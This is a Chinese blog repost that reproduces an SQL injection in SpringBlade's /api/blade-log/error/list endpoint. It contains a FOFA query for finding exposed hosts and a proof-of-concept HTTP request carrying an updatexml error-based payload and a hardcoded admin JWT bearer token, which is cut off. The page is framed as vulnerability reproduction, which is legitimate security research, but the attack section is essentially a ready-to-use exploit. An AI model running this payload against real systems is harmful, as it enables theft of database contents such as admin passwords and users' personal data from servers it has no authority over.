热门标签
热门文章
- 1华为OD机试统一考试D卷C卷 - 可以组成网络的服务器(C++ Java JavaScript Python C语言)_华为od机试可以组成网络的服务器数
- 2java 牛客网之[动态规划 简单]NC1 子数组最大连续和_给定一个长度为 n 的数组,数组中的数为整数。请你选择一个非空连续子数组,使该子
- 3保研经验总结上篇_保研综合测评
- 43Dslicer_Editor(2)_3d slicer膨胀腐蚀
- 5华师计算机设计大赛,广东省首届高校大学生计算机设计大赛在华师举行
- 6redis 内存不足 排查_Redis连接问题排查与解决
- 7kali Linux 安装教程(保姆级)_kalilinux
- 8Python制作【大麦网】抢票程序,看演唱会再也不怕没票了_python抢票(1)_python自动抢票代码大麦
- 92024全国危险化学品经营单位安全管理人员在线模拟_某企业组织编制专项预案,因缺少人员
- 10A mapped type may not declare properties or methods in TS
当前位置: article > 正文
SpringBlade error/list SQL 注入漏洞复现_api-list接口处存在sql注入漏洞
作者:繁依Fanyi0 | 2024-06-20 09:22:23
赞
踩
api-list接口处存在sql注入漏洞
0x01 产品简介
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。
0x02 漏洞概述
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 复现环境
FOFA:body="https://bladex.vip"
0x04 漏洞复现
PoC
- GET /api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/739342
推荐阅读
相关标签
